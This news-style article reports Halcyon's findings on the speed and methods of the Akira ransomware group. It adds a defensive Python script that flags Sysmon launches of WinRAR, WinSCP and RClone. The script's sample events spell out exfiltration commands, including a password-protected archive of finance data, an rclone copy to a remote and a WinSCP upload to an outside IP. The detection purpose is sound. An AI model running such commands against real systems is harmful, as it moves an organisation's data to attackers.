Security researchers warn of a velocity shift in ransomware after Halcyon reported that the Akira group can complete an entire attack lifecycle in under four hours, and in some cases in less than one hour, without being detected. Akira typically gains initial access by exploiting vulnerabilities in internet-facing VPN appliances and backup solutions, especially where multi-factor authentication is not enforced; products from SonicWall, Veeam and Cisco are among those previously observed being targeted.
The group is also known to use credential theft, spearphishing, password spraying and initial access brokers, and it follows the classic double-extortion model: data is exfiltrated before encryption, and detection is evaded by disabling security software and relying on legitimate, widely used tools rather than custom malware. The staging and transfer tools observed, FileZilla, WinRAR, WinSCP and RClone, are not built into Windows, so this is better described as attacker-introduced commodity tooling than as strict living-off-the-land use of native binaries, but the defensive consequence is the same: the binaries themselves are benign, so detection has to rest on context (parent process, account, command line and destination) rather than on the file.
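Because the binaries above are legitimate, the practical detection is a process-creation rule keyed on how they are invoked rather than on what they are. The following is an added example, not code from Halcyon or from the article, that scans Sysmon Event ID 1 records exported as JSON lines and grades each launch of the named tools. The field names (EventID, Image, CommandLine, ParentImage, User, ProcessId) follow Sysmon's schema; the default binary names, the command-line patterns and the severity scheme are the author's assumptions, and the sample events are constructed for the example.

```python
"""Grade launches of data-staging/transfer tools (WinRAR, WinSCP, FileZilla,
RClone) from Sysmon Event ID 1 records in JSON-lines form.

Heuristics, binary names and sample events are assumptions made for this
example; tune them to the tooling actually installed in your estate."""
import json
import re
from pathlib import PureWindowsPath

# Default install names (assumption): staging (archiving) vs. transfer tools.
STAGING_TOOLS = {"winrar.exe", "rar.exe"}
TRANSFER_TOOLS = {"rclone.exe", "winscp.exe", "filezilla.exe"}

# rclone copy/sync/move whose arguments include a "remote:" target. A single
# letter before the colon (C:) is a drive, so we require two or more characters.
RCLONE_TRANSFER = re.compile(r"\b(copy|sync|move|copyto|moveto)\b.*(?<!\S)[\w-]{2,}:", re.I)
# WinSCP scripted session that uploads ("put") or pushes a remote sync.
WINSCP_UPLOAD = re.compile(r"/command\b.*\b(put|synchronize\s+remote)\b", re.I)
# rar/winrar "a" = add to archive; -hp / -p set an archive password.
RAR_ADD = re.compile(r"^a\b", re.I)
RAR_PASSWORD = re.compile(r"\s-(hp|p)\S", re.I)


def split_args(cmd: str) -> str:
    """Return the argument string after the leading (possibly quoted) image token."""
    m = re.match(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$', cmd, re.DOTALL)
    return m.group(1) if m else ""


def classify(ev: dict):
    """Return (severity, reason) for a process-creation event, or None if the
    image is not one of the tools we care about."""
    name = PureWindowsPath(ev.get("Image", "")).name.lower()
    if name not in STAGING_TOOLS | TRANSFER_TOOLS:
        return None
    args = split_args(ev.get("CommandLine", ""))
    if name == "rclone.exe" and RCLONE_TRANSFER.search(args):
        return "high", "rclone transfer to a configured remote"
    if name == "winscp.exe" and WINSCP_UPLOAD.search(args):
        return "high", "WinSCP scripted upload"
    if name in STAGING_TOOLS and RAR_ADD.search(args):
        suffix = " with password" if RAR_PASSWORD.search(args) else ""
        return "medium", "archive creation" + suffix
    parent = PureWindowsPath(ev.get("ParentImage", "")).name or "unknown"
    return "low", f"{name} launched (hunting lead; parent {parent})"


def scan(log_text: str) -> list:
    """Parse JSON lines, keep Sysmon process-creation events, return alerts."""
    alerts = []
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # not an event record; skip rather than crash the scan
        if ev.get("EventID") != 1:
            continue
        verdict = classify(ev)
        if verdict is None:
            continue
        severity, reason = verdict
        alerts.append({"pid": ev.get("ProcessId"), "user": ev.get("User"),
                       "tool": PureWindowsPath(ev["Image"]).name,
                       "severity": severity, "reason": reason})
    return alerts


# Constructed sample: a staging-then-exfil sequence under a service account,
# plus a benign user extracting a download and a non-process event.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "User": "CORP\\svc_backup",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Users\\Public\\rclone.exe",
     "CommandLine": "rclone.exe copy C:\\Finance offsite:finance --config C:\\Users\\Public\\rc.conf -q"},
    {"EventID": 1, "ProcessId": 4122, "User": "CORP\\svc_backup",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Program Files\\WinRAR\\rar.exe",
     "CommandLine": "\"C:\\Program Files\\WinRAR\\rar.exe\" a -r -hpXyZ C:\\Users\\Public\\fin.rar \\\\fs01\\Finance"},
    {"EventID": 1, "ProcessId": 5010, "User": "CORP\\svc_backup",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Program Files (x86)\\WinSCP\\WinSCP.exe",
     "CommandLine": "WinSCP.exe /command \"open sftp://u@203.0.113.9/\" \"put C:\\Users\\Public\\fin.rar\" \"exit\""},
    {"EventID": 1, "ProcessId": 6001, "User": "CORP\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "CommandLine": "\"C:\\Program Files\\WinRAR\\WinRAR.exe\" x C:\\Users\\alice\\Downloads\\driver.zip"},
    {"EventID": 3, "ProcessId": 6001, "Image": "C:\\Windows\\explorer.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a['severity']:6}] pid={a['pid']} user={a['user']} {a['tool']}: {a['reason']}")
```

The point of the grading is the one the article makes implicitly: a user unpacking a download with WinRAR is only a hunting lead, while an archive with a password followed by an rclone or WinSCP push from a service account under cmd.exe is the double-extortion exfiltration stage, and it is the combination of actor, parent and destination that separates the two, not the executable name.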
Akira’s rapid compromise capabilities, disciplined operational tempo and investment in reliable decryption infrastructure are cited as differentiators, and the US government attributes as much as $244m in illicit gains to the group since it emerged in March 2023. Halcyon advises organisations to implement layered defences, harden initial access, limit lateral movement and credential abuse, and deploy anti-ransomware solutions that block malicious binaries before they execute.